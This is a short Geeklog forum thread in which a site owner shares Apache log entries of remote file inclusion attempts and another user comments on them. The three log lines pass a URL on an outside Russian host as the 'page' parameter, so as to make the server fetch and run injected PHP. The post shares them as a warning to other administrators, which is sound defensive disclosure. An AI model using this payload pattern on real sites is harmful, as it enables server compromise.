Geeklog Forums

Looking at webalizer stats, I noted about a thousand referrals from a website I never heard about before. having a closer look at apache access_log, I found hundreds of entries like this:

212.34.137.241 - - [08/Mar/2008:07:24:45 -0600] "GET /staticpages/index.php/instalando-mysql-php-solaris/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31880 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:47 -0600] "GET /index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 78689 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:53 -0600] "GET /staticpages/index.php/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31788 "-" "libwww-perl/5.79"

Seems somebody tried to run a code injection script hosted at http://www.paintland.ru/newsite/modules/id.txt (looks like a PHP Nuke blog about Paintball in russian). No damage done. My Geeklog website is running perfectly well and untouched and un-defaced.

Anyway, I felt it would be useful to share this to Geeklog Community, just in case.

---

--
https://www.AlcanceLibre.org/
https://blog.AlcanceLibre.org/
La libertad del conocimiento al alcance de quien la busca.

Yeah, these have become a real pest - a complete width of CPU and bandwidth. Not much you can do about them, though.

bye, Dirk